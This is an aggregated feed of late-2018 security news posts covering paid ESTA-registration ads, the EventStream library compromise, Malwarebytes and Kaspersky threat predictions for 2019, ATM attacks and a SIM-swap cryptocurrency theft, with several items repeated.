Sure, everyone hates paperwork, but many people are needlessly paying for service that does, essentially, nothing. The idea is, you fill in the ESTA questions and submit to Homeland Security. You then get an authorisation or a rejection. These sites want you to pay them for filling in essentially the exact same form you’d fill on the USGOV website so they can, in turn, “submit” it on the USGOV submission page. They’ll also often charge a lot more than the standard US$14 submission fee.

That’s…not so great

The flaw here is that if you can submit this information to the third party ESTA registration website, there’s no reason why you couldn’t have just done it yourself on the official USGOV website and saved the additional fee. Once you consider the inflated fees and the fact you might be submitting sensitive personal information and/or payment details to random websites, it quickly becomes an issue.

Why pay $80 instead of $14? It doesn’t really make sense, and this is partly why Google is now cracking down on these sorts of advertisements.

What does Google say about this?

From their Advertising Policies page, Google prohibits the sale of free items. The following is not allowed:

Charging for products or services where the primary offering is available from a government or public source for free or at a lower price

Examples (non-exhaustive list): Services for passport or driving license applications; health insurance applications; documents from official registries, such as birth certificates, marriage certificates, or company registrations; exam results; tax calculators.

Note: You can bundle something free with another product or service that you provide. For example, a TV provider can bundle publicly available content with paid content, or a travel agency can bundle a visa application with a holiday package. But the free product or service can’t be advertised as the primary offering.

Google search results

We thought we’d see what, exactly, is still out there in Google search land. For this, we decided to try common ESTA-related search terms. I went with “ESTA” (naturally), “ESTA questions,” and “ESTA answers.” Here’s what I found:

Search term: ESTA

How popular a Worldwide search term is “ESTA” over time?

esta trends

Click to Enlarge

A search for the word “ESTA” brings back no adverts in the search results whatsoever. That’s good!

esta no ads

Click to enlarge

Search term: ESTA questions

How popular a Worldwide search term is “ESTA questions” over time?

esta question trends

Click to Enlarge

A search for “ESTA questions” returned one result, which is still quite good. However, Google said common search terms would no longer fetch ads. Our search above seems pretty basic and still snagged a hit.

 esta questions

Click to enlarge

The website featured in the advert doesn’t mention cost on the front page, but does on Terms of Use. Their basic fee is US$14 for the USGOV application, and US$85 for their listed services. This is arguably the kind of site Google is trying remove.

Search Term: ESTA answers

How popular a Worldwide search term is “ESTA answers” over time?

esta answer trends

Click to Enlarge

“ESTA answers” returned four adverts.

 esta answers

Click to enlarge

First result: The same site listed for “ESTA questions” also made top spot under this search term.

Second result: Costs a grand total of US$89, which includes the US$14 Government fee. However, they are upfront about the fact that the service charge won’t apply should you apply directly on the Homeland Security portal. Many sites don’t mention this or hide it away in some terms and conditions.

Third result: Uh, an advert for dust extraction systems. At least there’s definitely no overpriced ESTA fee this time around.

Fourth result: The site lists their fees as US$79, which includes the US$14 Government charge.

We’ve reported all sites to Google whose adverts potentially conflict with Google’s ad policies.

How does Yahoo! stack up?

We looked at Yahoo! to see what we could find in terms of ESTA ads. As far as their Policies for Ads go, the closest thing I could find was “Low quality offers and landing page techniques” from the Oath Ad Policies page:

Services that are offered for free by the government and offered by third parties without adding any additional value to the user, such as green card lotteries Display and Native ads promoting body branding, piercings or tattoos

This doesn’t really apply here though, as ESTA carries the $14 application fee. On the other hand, there could well be something else I’ve missed in the numerous terms and conditions for advertisers. With that in mind, let’s see what we found.

Searching for “ESTA” brought back no fewer than four ads under the search bar, and seven down the side, with actual search results quite a bit further down the page.

 esta yahoo

Click to enlarge

In terms of the sites themselves, we had a mixed response with regards to upfront pricing information.

First result: The same site in both “ESTA questions” and “ESTA answers” Google searches returns again, with their now familiar combined fee of $14 and $85.

Second result: No information visible for fees that we could find.

Third result: This site offers a fee of 59 Euros.

Fourth result: We couldn’t find details of pricing, and the FAQ drop-downs didn’t work, so if the information was in there, we couldn’t see it.

Here’s the results for the adverts down the right-hand side:

First result: US$89 for services offered.

Second result: No price or FAQs visible, just a form submission process. There was a webchat, however, and we were able to obtain a price that way instead: 89 Euro/US$100 for a US ESTA submission.

 esta chat

Click to enlarge

Third result: No price visible that we could find.

Fourth result: US$79 plus US$14 Government fee

Fifth result: Nothing visible that we could find.

Sixth result: 84 Euros (this includes a “2-year concierge service”)

Seventh result: £37.82, US$14 Government fee, plus £1 “overseas transition/calling card fee”

Looking for travel assistance online?

There are many pitfalls lurking online the moment you go looking for visas, ESTAs, or anything else. It seems baffling to me that people would pay someone else to submit a form to a third party when they have to fill out the form themselves first. Are the extra services promoted by these sites really worth it? Some claim to retain your data “for up to two years” in case you need to reapply. The ESTA is valid for two years, by which point they’d no longer be retaining your information, so I don’t see how this helps.

“Aha”, they’ll say. “We don’t retain the data for two years in case you need to apply for the ESTA again. We retain it in case you’re denied authorisation so you can have another go!”

Well, great, except not really. If you’re denied an ESTA at application time, that’s the end of that:

If a traveler is denied ESTA authorization and his or her circumstances have not changed, a new application will also be denied. A traveler who is not eligible for ESTA is not eligible for travel under the Visa Waiver Program and should apply for a nonimmigrant visa at a U.S. Embassy or Consulate. Reapplying with false information in order to qualify for a travel authorization will make the traveler permanently ineligible for travel to the United States under the Visa Waiver Program

Time for a little DIY

On a similar note, these sites do offer to check that all of your information is correct before submitting. The information you need to supply for an ESTA is basic stuff, though: name, address, passport number, and answers to a series of yes/no questions. It’s not complicated, and you could easily have a friend or relative look it over before submitting it online yourself. “Concierge” services sound good, but there’s so much information online, you shouldn’t have trouble finding a hotel or a taxi service or anything else for that matter.

If you insist on making use of an ESTA application website, keep in mind the above commentary. You should also be wary of sites that aren’t upfront with their pricing. Pay particular attention as to whether they retain a copy of your data and for how long. If they promote the benefit of retaining it for less than two years in case you want to “reapply,” that’s not a great sign. If they refer to the ESTA as a “visa,” also not good. (It isn’t a visa; it’s access to participation in the Visa Waiver Program.)

Keep your passport and your online wits close to hand, and you won’t have any problems. Safe travels!

The post ESTA registration websites still lurk in paid ads on Google appeared first on Malwarebytes Labs.

SecurityWeek RSS Feed: Cryptocurrency-Stealing Code Distributed via Popular Library

The popular EventStream Node.js library was recently modified to fetch malicious code designed to steal crypto-currencies.

Designed as a toolkit to make creating and working with streams easy, the JavaScript package has around two million downloads a week, which makes it a valuable resource to application developers and malicious actors alike.

read more



SecurityWeek RSS Feed

Cryptocurrency-Stealing Code Distributed via Popular Library

The popular EventStream Node.js library was recently modified to fetch malicious code designed to steal crypto-currencies.

Designed as a toolkit to make creating and working with streams easy, the JavaScript package has around two million downloads a week, which makes it a valuable resource to application developers and malicious actors alike.

read more

Malwarebytes’ 2019 security predictions

Every year, we at Malwarebytes Labs like to stare into our crystal ball and foretell the future of malware.

Okay, maybe we don’t have a crystal ball, but we do have years and years of experience in observing trends and sensing shifts in patterns. When it comes to security, though, we can only know so much. For example, we guarantee there’ll be some kind of development that we had zero indication would occur. We also can pretty much assure you that data breaches will keep happening—just as the sun rises and sets.

And while all hope is for a malware-free 2019, the reality will likely look a little more like this:

New, high-profile breaches will push the security industry to finally solve the username/password problem. The ineffective username/password conundrum has plagued consumers and businesses for years. There are many solutions out there—asymmetric cryptography, biometrics, blockchain, hardware solutions, etc.—but so far, the security industry has not been able to settle on a standard to fix the problem. In 2019, we will see a more concerted effort to replace passwords altogether.

IoT botnets will come to a device near you. In the second half of 2018, we saw several thousand MikroTik routers hacked to serve up coin miners. This is only the beginning of what we will likely see in the new year, with more and more hardware devices being compromised to serve up everything from cryptominers to Trojans. Large scale compromises of routers and IoT devices are going to take place, and they are a lot harder to patch than computers. Even just patching does not fix the problem, if the device is infected.

Digital skimming will increase in frequency and sophistication. Cybercriminals are going after websites that process payments and compromising the checkout page directly. Whether you are purchasing roller skates or concert tickets, when you enter your information on the checkout page, if the shopping cart software is faulty, information is sent in clear text, allowing attackers to intercept in real time. Security companies saw evidence of this with the British Airways and Ticketmaster hacks.

Microsoft Edge will be a prime target for new zero-day attacks and exploit kits. Transitioning out of IE, Microsoft Edge is gaining more market share. We expect to see more mainstream Edge exploits as we segue to this next generation browser. Firefox and Chrome have done a lot to shore up their own technology, making Edge the next big target.

EternalBlue or a copycat will become the de facto method for spreading malware in 2019. Because it can self-propagate, EtnernalBlue and others in the SMB vulnerability present a particular challenge for organizations, and cybercriminals will exploit this to distribute new malware.

Cryptomining on desktops, at least on the consumer side, will just about die. Again, as we saw in October (2018) with MikroTik routers being hacked to serve up miners, cybercriminals just aren’t getting value out of targeting individual consumers with cryptominers. Instead, attacks distributing cryptominers will focus on platforms that can generate more revenue (servers, IoT) and will fade from other platforms (browser-based mining).

Attacks designed to avoid detection, like soundloggers, will slip into the wild. Keyloggers that record sounds are sometimes called soundloggers, and they are able to listen to the cadence and volume of tapping to determine which keys are struck on a keyboard. Already in existence, this type of attack was developed by nation-state actors to target adversaries. Attacks using this and other new attack methodologies designed to avoid detection are likely to slip out into the wild against businesses and the general public.

Artificial Intelligence will be used in the creation of malicious executables While the idea of having malicious AI running on a victim’s system is pure science fiction at least for the next 10 years, malware that is modified by, created by, and communicating with an AI is a dangerous reality. An AI that communicates with compromised computers and monitors which and how certain malware is detected can quickly deploy countermeasures. AI controllers will enable malware built to modify its own code to avoid being detected on the system, regardless of the security tool deployed. Imagine a malware infection that acts almost like “The Borg” from Star Trek, adjusting and acclimating its attack and defense methods on the fly based on what it is up against.

Bring your own security grows as trust declines. More and more consumers are bringing their own security to the work place as a first or second layer of defense to protect their personal information. Malwarebytes recently conducted global research and found that nearly 200,000 companies had a consumer version of Malwarebytes installed. Education was the industry most prone to adopting BYOS, followed by software/technology and business services. 

The post Malwarebytes’ 2019 security predictions appeared first on Malwarebytes Labs.

ATM attackers strike again: Are you at risk?

The United States National ATM Council recently released information about a series of ATM attacks using rogue network devices. The criminals opened the upper half of the ATM and installed the device, most likely into the Ethernet switch. The device then intercepted the ATM’s network traffic and changed the bank’s “withdraw denied” response to “withdraw approved,” presumably only for the criminals’ cards. For many readers, the attacks’ success may be surprising. However, IBM X-Force Red … More

The post ATM attackers strike again: Are you at risk? appeared first on Help Net Security.

Securelist: Threat predictions for industrial security in 2019

The past few years have been very intense and eventful when it comes to incidents affecting the information security of industrial systems. That includes new vulnerabilities, new threat vectors, accidental infections of industrial systems and detected targeted attacks. In response, last year we developed some Threat Predictions for Industrial Security in 2018, outlining the trends most likely to unfold in the year ahead.

The industrial cybersecurity threat landscape moves at a slower and more rigid pace than the information technology threat landscape in general. Attacks on ICS are still hard to monetize. Industrial organizations are still out of scope for the majority of cybercriminals. They are a relatively new target for adversaries who have already started attacking them. These are still applying existing tools and tactics to their attacks. That is why the majority of the industrial threat predictions from last year are still unfolding, although some of them have already come true.

Kaspersky Lab specialists have spent a few years investigating the cyberthreat landscape for industrial organizations and trying to bring their expertise and technology to OT environments. We are still on a long journey, with various to difficulties cope with and problems yet to solve. Constantly keeping in contact with many researchers in other security organizations and some ICS security pioneers from inside industrial companies; we have come to the conclusion that some of the difficulties we face are common to the industry. Solving some of those is mandatory to make the world more secure and safe.

So, although the fog of 2018’s predictions and threat landscape has yet to clear, we decided to focus on the major problems likely to affect the work of professionals involved in industrial systems in 2019.

Top four cybersecurity challenges facing industrial enterprises in 2019

The ever-increasing attack surface

The increasing amount of automation systems, the variety of automation tools, number of organizations and individuals with direct or remote access to automation systems, as well as the emergence of communication channels for monitoring and remote control between previously independent objects – all expand the opportunities for criminals to plan and execute their attacks.

Growing interest of cybercriminals and special services

A decrease in profitability and increase in risks from cyberattacks aimed at traditional victims is pushing criminals to search for new targets, including those within industrial organizations.

At the same time, special services in many countries, as well as other organized groups – motivated by internal and external political interests – and financially-motivated groups, are actively engaged in the research and development of techniques to implement espionage and terrorist attacks aimed at industrial enterprises.

Taking into account the current geopolitical context, the development of industrial enterprises’ automation systems, and the transition to new management processes and models of production and economic activity, this situation will continue to develop in the coming years, negatively affecting industrial organizations.

The underestimation of general threat levels

A lack of public access to information about information security issues within industrial enterprises, coupled with the relative rarity of targeted attacks on automation systems, an excessive belief in emergency protection systems and the denial of objective reality is having a negative effect on the assessment of threat levels by owners and operators of industrial enterprises and their personnel.

The misunderstanding of threat specifics and the suboptimal choice of protection options

In the world of industrial cybersecurity, several high–profile incidents carried out with the help of targeted attacks against a very limited number of victims, created an information landscape that formed fully the idea of a potential threat – both among information security researchers and security developers, and among potential users of these tools.

However, the professional reporting of these incidents was often too difficult to understand by the majority of potential users, and was devoid of important OT details. The information field formed in these conditions, including the absence of a daily need to deflect the attacks aimed at automated control systems, gave developers a chance to create products that might protect better from the artificial scenarios thought up by researchers themselves, than from real world day-to-day threats. This could leave the automation systems of industrial enterprises vulnerable to real life attacks, including random ones and targeted attack campaigns organized by cyber criminals.

Full version of the threat predictions will be published on ICS CERT website.

Full report “Kaspersky Security Bulletin: Threat predictions for industrial security in 2019″ (English, PDF)



Securelist

Threat predictions for industrial security in 2019

The past few years have been very intense and eventful when it comes to incidents affecting the information security of industrial systems. That includes new vulnerabilities, new threat vectors, accidental infections of industrial systems and detected targeted attacks. In response, last year we developed some Threat Predictions for Industrial Security in 2018, outlining the trends most likely to unfold in the year ahead.

The industrial cybersecurity threat landscape moves at a slower and more rigid pace than the information technology threat landscape in general. Attacks on ICS are still hard to monetize. Industrial organizations are still out of scope for the majority of cybercriminals. They are a relatively new target for adversaries who have already started attacking them. These are still applying existing tools and tactics to their attacks. That is why the majority of the industrial threat predictions from last year are still unfolding, although some of them have already come true.

Kaspersky Lab specialists have spent a few years investigating the cyberthreat landscape for industrial organizations and trying to bring their expertise and technology to OT environments. We are still on a long journey, with various to difficulties cope with and problems yet to solve. Constantly keeping in contact with many researchers in other security organizations and some ICS security pioneers from inside industrial companies; we have come to the conclusion that some of the difficulties we face are common to the industry. Solving some of those is mandatory to make the world more secure and safe.

So, although the fog of 2018’s predictions and threat landscape has yet to clear, we decided to focus on the major problems likely to affect the work of professionals involved in industrial systems in 2019.

Top four cybersecurity challenges facing industrial enterprises in 2019

The ever-increasing attack surface

The increasing amount of automation systems, the variety of automation tools, number of organizations and individuals with direct or remote access to automation systems, as well as the emergence of communication channels for monitoring and remote control between previously independent objects – all expand the opportunities for criminals to plan and execute their attacks.

Growing interest of cybercriminals and special services

A decrease in profitability and increase in risks from cyberattacks aimed at traditional victims is pushing criminals to search for new targets, including those within industrial organizations.

At the same time, special services in many countries, as well as other organized groups – motivated by internal and external political interests – and financially-motivated groups, are actively engaged in the research and development of techniques to implement espionage and terrorist attacks aimed at industrial enterprises.

Taking into account the current geopolitical context, the development of industrial enterprises’ automation systems, and the transition to new management processes and models of production and economic activity, this situation will continue to develop in the coming years, negatively affecting industrial organizations.

The underestimation of general threat levels

A lack of public access to information about information security issues within industrial enterprises, coupled with the relative rarity of targeted attacks on automation systems, an excessive belief in emergency protection systems and the denial of objective reality is having a negative effect on the assessment of threat levels by owners and operators of industrial enterprises and their personnel.

The misunderstanding of threat specifics and the suboptimal choice of protection options

In the world of industrial cybersecurity, several high–profile incidents carried out with the help of targeted attacks against a very limited number of victims, created an information landscape that formed fully the idea of a potential threat – both among information security researchers and security developers, and among potential users of these tools.

However, the professional reporting of these incidents was often too difficult to understand by the majority of potential users, and was devoid of important OT details. The information field formed in these conditions, including the absence of a daily need to deflect the attacks aimed at automated control systems, gave developers a chance to create products that might protect better from the artificial scenarios thought up by researchers themselves, than from real world day-to-day threats. This could leave the automation systems of industrial enterprises vulnerable to real life attacks, including random ones and targeted attack campaigns organized by cyber criminals.

Full version of the threat predictions will be published on ICS CERT website.

Full report “Kaspersky Security Bulletin: Threat predictions for industrial security in 2019″ (English, PDF)

Securelist: Cyberthreats to financial institutions 2019: overview and predictions

Introduction – key events in 2018

The past year has been extremely eventful in terms of the digital threats faced by financial institutions: cybercrime groups have used new infiltration techniques, and the geography of attacks has become more extensive.

Despite this, let’s start the review with a positive trend: in 2018 police arrested a number of well-known cybercrime group members responsible for Carbanak/Cobalt and Fin7, among others. These groups have been involved in attacks on dozens, if not hundreds of companies and financial institutions around the world. Unfortunately, the arrest of group members including the leader of Carbanak, did not lead to a complete halt in activities – in fact, it seemingly started the process of splitting the groups into smaller cells.

The most active actor of 2018 was Lazarus. This group is gradually expanding its arsenal of tools and looking for new targets. The area of interest today includes banks, fin-tech companies, crypto-exchanges, PoS terminals, ATMs, and in terms of geography, we have recorded infection attempts in dozens of countries, most of which are located in Asia, Africa and Latin America.

At the end of last year, we noted that young fin-tech companies and crypto-exchanges are at a higher risk, due to the immaturity of their security systems. This certain type of companies was targeted most often. The most creative attack seen in 2018, from our point of view, was AppleJeus, which targeted cryptocurrency traders. In this case, criminals created special software that looked legitimate and carried out legitimate functions. However, the program also uploaded a malicious update that turned out to be a backdoor. This is a new type of attack, which infects its targets via the supply chain.

Continuing the topic of supply chain attacks, it is worth mentioning the MageCart group, which, by infecting website payment pages (including those of large companies such as British Airways) was able to access a huge amount of payment card data this year. This attack was even more effective because the criminals chose an interesting target – Magento, which is one of the most popular platforms for online stores. Using vulnerabilities in Magento, criminals were able to infect dozens of sites in a technique that is likely to be used by several other groups.

We should also note the development of ATM malware families. In 2018, Kaspersky Lab specialists discovered six new families, meaning that there are now more than 20 of this kind. Some ATM malware families have also evolved: for example, the Plotus malware from Latin America has been updated to a new version, Peralda, and has gained new functionality as a result. The greatest damage associated with attacks on ATMs was caused by infections from internal banking networks, such as FASTCash and ATMJackPot, which allowed attackers to reach thousands of ATMs.

2018 also saw attacks on organizations that use banking systems. Firstly, our machine learning-based behavioral analysis system detected several waves of malicious activity related to the spread of the Buhtrap banking Trojan this year, as attackers embedded their code in popular news sites and forums. Secondly, we detected attacks on the financial departments of industrial companies, where payments of hundreds of thousands of dollars would not cause much suspicion. Often in the final stages of attacks like this, attackers install remote administration tools on infected computers such as RMS, TeamViewer, and VNC.

Before giving our forecasts for 2019, let’s see how accurate our forecasts for 2018 turned out to be…

  • Attacks made through the underlying blockchain technologies of financial systems implemented by the financial institutions themselves – this did not happen in the financial field, but was seen in the online casino sector.
  • More supply chain attacks in the financial world – yes
  • Attacks on mass media (in general, including Twitter accounts, Facebook pages, telegram channels and more) including hacks and manipulation for getting financial profit through stock/crypto exchange trade – yes
  • ATM malware automation – yes. For example, there are malicious programs that immediately give money to attackers.
  • More attacks on crypto exchange platforms – yes
  • A spike in traditional card fraud due to the huge data breaches that happened in the previous year – no
  • More nation-state sponsored attacks against financial organizations – yes
  • The inclusion of fin-techs and mobile-only users in attacks: a fall in the number of traditional PC-oriented internet banking Trojans, with novice mobile banking users becoming the new prime target for criminals – yes. In particular, some banking Trojans stopped attacking users of online banking on PCs, while the number of Trojans attacking users of mobile devices has more than doubled over the past year.

Predictions for 2019

  • The emergence of new groups due to the fragmentation of Cobalt/Carbnal and Fin7: new groups and new geography

The arrest of leaders and separate members of major cybercrime groups has not stopped these groups from attacking financial institutions. Next year, we will most likely see the fragmentation of these groups and the creation of new ones by former members, which will lead to the intensification of attacks and the expansion of the geography of potential victims.

At the same time, local groups will expand their activities, increasing quality and scale. It is reasonable to assume that some members of the regional groups may contact former members of the Win7 or Cobalt group to facilitate access to regional targets and gain new tools with which they can carry out attacks.

  • The first attacks through the theft and use of biometric data

Biometric systems for user identification and authentication are being gradually implemented by various financial institutions, and several major leaks of biometric data have already occurred. These two facts lay the foundation for the first POC (proof-of-concept) attacks on financial services using leaked biometric data.

  • The emergence of new local groups attacking financial institutions in the Indo-Pakistan region, South-East Asia and Central Europe

The activity of cybercriminals in these regions is constantly growing: the immaturity of protective solutions in the financial sector and the rapid spread of various electronic means of payment among the population and companies in these regions are contributing to this. Now, all the prerequisites exist for the emergence of a new center for financial threats in Asia, in addition to the three already in Latin America, Korean peninsula and the ex-USSR.

  • Continuation of the supply-chain attacks: attacks on small companies that provide their services to financial institutions around the world

This trend will remain with us in 2019. Attacks on software providers have proven effective and allowed attackers to gain access to several major targets. Small companies (that supply specialized financial services for the larger players) will be jeopardized first, such as the suppliers of money transfer systems, banks and exchanges.

  • Traditional cybercrime will focus on the easiest targets and bypass anti-fraud solutions: replacement of PoS attacks with attacks on systems accepting online payments

Next year, in terms of threats to ordinary users and stores, those who use cards without chips and do not use two-factor authorization of transactions will be the most at risk. The malicious community has focused on some simple goals that are easy to monetize. However, this does not mean that they do not use any complex techniques. For example, to bypass anti-fraud systems, they copy all computer and browser system settings. On the other hand, this cybercriminal behavior will mean that the number of attacks on PoS terminals will decrease, and they will move towards attacks on online payment platforms instead.

  • The cybersecurity systems of financial institutions will be bypassed using physical devices connected to the internal network

Due to the lack of physical security and the lack of control over connected devices in many networks, cybercriminals will more actively exploit situations where a computer or mini-board can be installed, specifically configured to steal data from the network and transfer the information using 4G/LTE modems.

Attacks like this will provide cybergangs with an opportunity to access various data, including information about the customers of financial institutions, as well as the network infrastructure of financial institutions.

  • Attacks on mobile banking for business users

Mobile applications for business are gaining popularity, which is likely to lead to the first attacks on their users. There are enough tools for this, and the possible losses that businesses incur are much higher than the losses incurred when individuals are attacked. The most likely attack vectors are attacks at the Web API level and through the supply chain.

  • Advanced social engineering campaigns targeting operators, secretaries and other internal employees in charge of wires: result of data leaks

Social engineering is particularly popular in some regions, for example Latin America. Cybercriminals keep targeting specific people in companies and financial institutions to make them wire big sums of money. Due to high amount of data leakages previous years this type of attacks becomes more effective, since criminals are able to use leaked internal information about targeted organization to make their messages look absolutely legit. Main idea remains the same: they make these targets believe that the financial request has come from business partners or directors. These techniques use zero malware, but demonstrate how targeted social engineering gets results and will become more powerful in 2019. This includes attacks like “simswap”.

 “Cyberthreats to financial institutions 2019: overview and predictions” (PDF)



Securelist

Cyberthreats to financial institutions 2019: overview and predictions

Introduction – key events in 2018

The past year has been extremely eventful in terms of the digital threats faced by financial institutions: cybercrime groups have used new infiltration techniques, and the geography of attacks has become more extensive.

Despite this, let’s start the review with a positive trend: in 2018 police arrested a number of well-known cybercrime group members responsible for Carbanak/Cobalt and Fin7, among others. These groups have been involved in attacks on dozens, if not hundreds of companies and financial institutions around the world. Unfortunately, the arrest of group members including the leader of Carbanak, did not lead to a complete halt in activities – in fact, it seemingly started the process of splitting the groups into smaller cells.

The most active actor of 2018 was Lazarus. This group is gradually expanding its arsenal of tools and looking for new targets. The area of interest today includes banks, fin-tech companies, crypto-exchanges, PoS terminals, ATMs, and in terms of geography, we have recorded infection attempts in dozens of countries, most of which are located in Asia, Africa and Latin America.

At the end of last year, we noted that young fin-tech companies and crypto-exchanges are at a higher risk, due to the immaturity of their security systems. This certain type of companies was targeted most often. The most creative attack seen in 2018, from our point of view, was AppleJeus, which targeted cryptocurrency traders. In this case, criminals created special software that looked legitimate and carried out legitimate functions. However, the program also uploaded a malicious update that turned out to be a backdoor. This is a new type of attack, which infects its targets via the supply chain.

Continuing the topic of supply chain attacks, it is worth mentioning the MageCart group, which, by infecting website payment pages (including those of large companies such as British Airways) was able to access a huge amount of payment card data this year. This attack was even more effective because the criminals chose an interesting target – Magento, which is one of the most popular platforms for online stores. Using vulnerabilities in Magento, criminals were able to infect dozens of sites in a technique that is likely to be used by several other groups.

We should also note the development of ATM malware families. In 2018, Kaspersky Lab specialists discovered six new families, meaning that there are now more than 20 of this kind. Some ATM malware families have also evolved: for example, the Plotus malware from Latin America has been updated to a new version, Peralda, and has gained new functionality as a result. The greatest damage associated with attacks on ATMs was caused by infections from internal banking networks, such as FASTCash and ATMJackPot, which allowed attackers to reach thousands of ATMs.

2018 also saw attacks on organizations that use banking systems. Firstly, our machine learning-based behavioral analysis system detected several waves of malicious activity related to the spread of the Buhtrap banking Trojan this year, as attackers embedded their code in popular news sites and forums. Secondly, we detected attacks on the financial departments of industrial companies, where payments of hundreds of thousands of dollars would not cause much suspicion. Often in the final stages of attacks like this, attackers install remote administration tools on infected computers such as RMS, TeamViewer, and VNC.

Before giving our forecasts for 2019, let’s see how accurate our forecasts for 2018 turned out to be…

  • Attacks made through the underlying blockchain technologies of financial systems implemented by the financial institutions themselves – this did not happen in the financial field, but was seen in the online casino sector.
  • More supply chain attacks in the financial world – yes
  • Attacks on mass media (in general, including Twitter accounts, Facebook pages, telegram channels and more) including hacks and manipulation for getting financial profit through stock/crypto exchange trade – yes
  • ATM malware automation – yes. For example, there are malicious programs that immediately give money to attackers.
  • More attacks on crypto exchange platforms – yes
  • A spike in traditional card fraud due to the huge data breaches that happened in the previous year – no
  • More nation-state sponsored attacks against financial organizations – yes
  • The inclusion of fin-techs and mobile-only users in attacks: a fall in the number of traditional PC-oriented internet banking Trojans, with novice mobile banking users becoming the new prime target for criminals – yes. In particular, some banking Trojans stopped attacking users of online banking on PCs, while the number of Trojans attacking users of mobile devices has more than doubled over the past year.

Predictions for 2019

  • The emergence of new groups due to the fragmentation of Cobalt/Carbnal and Fin7: new groups and new geography

The arrest of leaders and separate members of major cybercrime groups has not stopped these groups from attacking financial institutions. Next year, we will most likely see the fragmentation of these groups and the creation of new ones by former members, which will lead to the intensification of attacks and the expansion of the geography of potential victims.

At the same time, local groups will expand their activities, increasing quality and scale. It is reasonable to assume that some members of the regional groups may contact former members of the Win7 or Cobalt group to facilitate access to regional targets and gain new tools with which they can carry out attacks.

  • The first attacks through the theft and use of biometric data

Biometric systems for user identification and authentication are being gradually implemented by various financial institutions, and several major leaks of biometric data have already occurred. These two facts lay the foundation for the first POC (proof-of-concept) attacks on financial services using leaked biometric data.

  • The emergence of new local groups attacking financial institutions in the Indo-Pakistan region, South-East Asia and Central Europe

The activity of cybercriminals in these regions is constantly growing: the immaturity of protective solutions in the financial sector and the rapid spread of various electronic means of payment among the population and companies in these regions are contributing to this. Now, all the prerequisites exist for the emergence of a new center for financial threats in Asia, in addition to the three already in Latin America, Korean peninsula and the ex-USSR.

  • Continuation of the supply-chain attacks: attacks on small companies that provide their services to financial institutions around the world

This trend will remain with us in 2019. Attacks on software providers have proven effective and allowed attackers to gain access to several major targets. Small companies (that supply specialized financial services for the larger players) will be jeopardized first, such as the suppliers of money transfer systems, banks and exchanges.

  • Traditional cybercrime will focus on the easiest targets and bypass anti-fraud solutions: replacement of PoS attacks with attacks on systems accepting online payments

Next year, in terms of threats to ordinary users and stores, those who use cards without chips and do not use two-factor authorization of transactions will be the most at risk. The malicious community has focused on some simple goals that are easy to monetize. However, this does not mean that they do not use any complex techniques. For example, to bypass anti-fraud systems, they copy all computer and browser system settings. On the other hand, this cybercriminal behavior will mean that the number of attacks on PoS terminals will decrease, and they will move towards attacks on online payment platforms instead.

  • The cybersecurity systems of financial institutions will be bypassed using physical devices connected to the internal network

Due to the lack of physical security and the lack of control over connected devices in many networks, cybercriminals will more actively exploit situations where a computer or mini-board can be installed, specifically configured to steal data from the network and transfer the information using 4G/LTE modems.

Attacks like this will provide cybergangs with an opportunity to access various data, including information about the customers of financial institutions, as well as the network infrastructure of financial institutions.

  • Attacks on mobile banking for business users

Mobile applications for business are gaining popularity, which is likely to lead to the first attacks on their users. There are enough tools for this, and the possible losses that businesses incur are much higher than the losses incurred when individuals are attacked. The most likely attack vectors are attacks at the Web API level and through the supply chain.

  • Advanced social engineering campaigns targeting operators, secretaries and other internal employees in charge of wires: result of data leaks

Social engineering is particularly popular in some regions, for example Latin America. Cybercriminals keep targeting specific people in companies and financial institutions to make them wire big sums of money. Due to high amount of data leakages previous years this type of attacks becomes more effective, since criminals are able to use leaked internal information about targeted organization to make their messages look absolutely legit. Main idea remains the same: they make these targets believe that the financial request has come from business partners or directors. These techniques use zero malware, but demonstrate how targeted social engineering gets results and will become more powerful in 2019. This includes attacks like “simswap”.

 “Cyberthreats to financial institutions 2019: overview and predictions” (PDF)

Security Affairs: Hacker stole $1m from Silicon Valley executive via SIM swap

Nicholas Truglia, a 21-years-old man from New York, has stolen $1 million from Silicon Valley executive via SIM swap, and targeted other indivisuals.

Nicholas Truglia, a 21-years-old man from New York, has been accused of stealing $1 million from Silicon Valley executive via SIM swap. He gained access to his phone number and used it impersonate the executive and steal $500,000 from two accounts he had at Coinbase and Gemini.

The hack and consequent cyber heist occurred on October 26 and Truglia was arrested on November 14.

The man is suspected to have scammed more than six executives in the Bay Area.

“San Francisco resident Robert Ross, a father of two, noticed his phone suddenly lose its signal on Oct. 26. Confused, he went to a nearby Apple store and later contacted his service provider, AT&T. But he wasn’t quick enough to stop a hacker from draining $500,000 from two separate accounts he had at Coinbase and Gemini, according to Santa Clara officials.” reads a CNBC report.

“Nicholas Truglia, 21, lifted the $1 million from Ross’ two cryptocurrency accounts, according to a felony complaint filed this month in California state court. “

The man has been charged with a total of 21 crimes, including identity theft, fraud, embezzlement, and attempted grand theft. although his attempts to rob them ultimately failed.

Police raided the Truglia’s house under a warrant and able to recover $300,000 worth of cryptocurrency from his hardware wallet. At the time, there is no news about the remaining amount of money stolen by the man.

“It’s a whole new wave of crime,” said Erin West, the deputy district attorney of Santa Clara County. “It’s a new way of stealing of money: They target people that they believe to have cryptocurrency,” she told CNBC.

A SIM swap fraud is a type of fraud that overwhelms the additional security measures introduced by banks to protect customer transactions. Basically, cyber criminals are able to transfer cash from a victim’s account by accessing one-time pin codes and SMS notifications.

Attacker impersonates the victim to request the mobile provider’s tech support staff into reassigning the victim’s phone number to a SIM card owned by the crook. The procedure needs the attacker will answer a few security questions to verify the victim’s identity. Typically the attacker gathers the information to respond the questions through social engineering or through OSINT activities.

According to the court documents, Truglia also targeted Saswata Basu, the CEO of blockchain storage service 0Chain; Myles Danielson, a hedge-fund executive, and Gabrielle Katsnelson, co-founder of start-up SMBX.

Pierluigi Paganini

(Security Affairs – SIM swap, hacking)

The post Hacker stole $1m from Silicon Valley executive via SIM swap appeared first on Security Affairs.



Security Affairs

Hacker stole $1m from Silicon Valley executive via SIM swap

Nicholas Truglia, a 21-years-old man from New York, has stolen $1 million from Silicon Valley executive via SIM swap, and targeted other indivisuals.

Nicholas Truglia, a 21-years-old man from New York, has been accused of stealing $1 million from Silicon Valley executive via SIM swap. He gained access to his phone number and used it impersonate the executive and steal $500,000 from two accounts he had at Coinbase and Gemini.

The hack and consequent cyber heist occurred on October 26 and Truglia was arrested on November 14.

The man is suspected to have scammed more than six executives in the Bay Area.

